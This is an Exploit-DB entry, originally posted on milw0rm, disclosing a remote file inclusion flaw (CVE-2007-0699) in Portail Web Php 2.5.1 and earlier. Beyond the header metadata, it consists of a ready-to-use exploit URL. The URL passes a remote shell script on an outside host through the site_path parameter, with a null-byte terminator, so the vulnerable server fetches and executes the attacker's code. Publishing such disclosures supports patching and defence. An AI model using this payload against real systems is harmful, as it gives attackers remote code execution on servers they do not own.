Portail Web Php <= 2.5.1 includes.php Remote File Inclusion Vuln

2007-02-01T00:00:00
ID EDB-ID:3250
Type exploitdb
Reporter laurent gaffié
Modified 2007-02-01T00:00:00

Description

Portail Web Php <= 2.5.1 (includes.php) Remote File Inclusion Vuln. CVE-2007-0699. Webapps exploit for php platform

                                        
                                            php web portail [remote file include]
download site: https://sourceforge.net/project/showfiles.php?group_id=178400
product:php web portail
bug: remote file include
risk : high

remote file include :

/includes/includes.php?site_path=http://site.com/shell.txt?%00



laurent gaffiĂŠ
http://s-a-p.ca/
contact: saps.audit@gmail.com

# milw0rm.com [2007-02-01]